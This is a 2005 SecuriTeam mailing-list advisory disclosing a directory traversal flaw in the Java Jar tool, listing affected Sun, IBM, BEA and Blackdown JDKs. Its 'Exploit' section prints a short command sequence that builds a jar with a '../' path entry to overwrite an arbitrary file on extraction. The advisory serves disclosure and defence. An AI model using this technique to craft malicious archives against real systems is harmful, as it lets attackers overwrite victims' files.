[NEWS] Jar Tool Directory Transversal Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 04/11/05
- Previous message: SecuriTeam: "[NT] PopUp Plus Plugin for Miranda Instant Messenger Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 Apr 2005 18:59:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Jar Tool Directory Transversal Vulnerability
------------------------------------------------------------------------
SUMMARY
Jar is "a Java archiving and compression application, which is part of
many Java development kits. It was designed mainly to facilitate the
packaging of Java applets or applications into a single archive".
The Jar tool does not check properly if the files to be extracted have the
string "../" on its names, so it's possible for an attacker to create a
malicious jar file in order to overwrite arbitrary files within the file
system.
DETAILS
Affected Software:
The following Java development kits have been tested and contain the
vulnerability, but maybe others kits and/or platforms could be affected by
the same:
* SUN:
Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)
* IBM:
IBM Java Development Kit 1.4.2 Linux
* BEA:
BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows
version)
* BLACKDOWN:
Blackdown Java Development Kit 1.4.2 Linux
Exploit:
A malicious jar file can be created as follows:
java4fun# echo hi > /tmp/test
java4fun# jar cvf trash.jar *.class ../../../../../../../tmp/test
java4fun# rm /tmp/test
java4fun# jar xvf trash.jar (no overwrite message displayed)
java4fun# echo /tmp/test
hi
ADDITIONAL INFORMATION
The information has been provided by <mailto:pluf@7a69ezine.org> Pluf.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] PopUp Plus Plugin for Miranda Instant Messenger Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
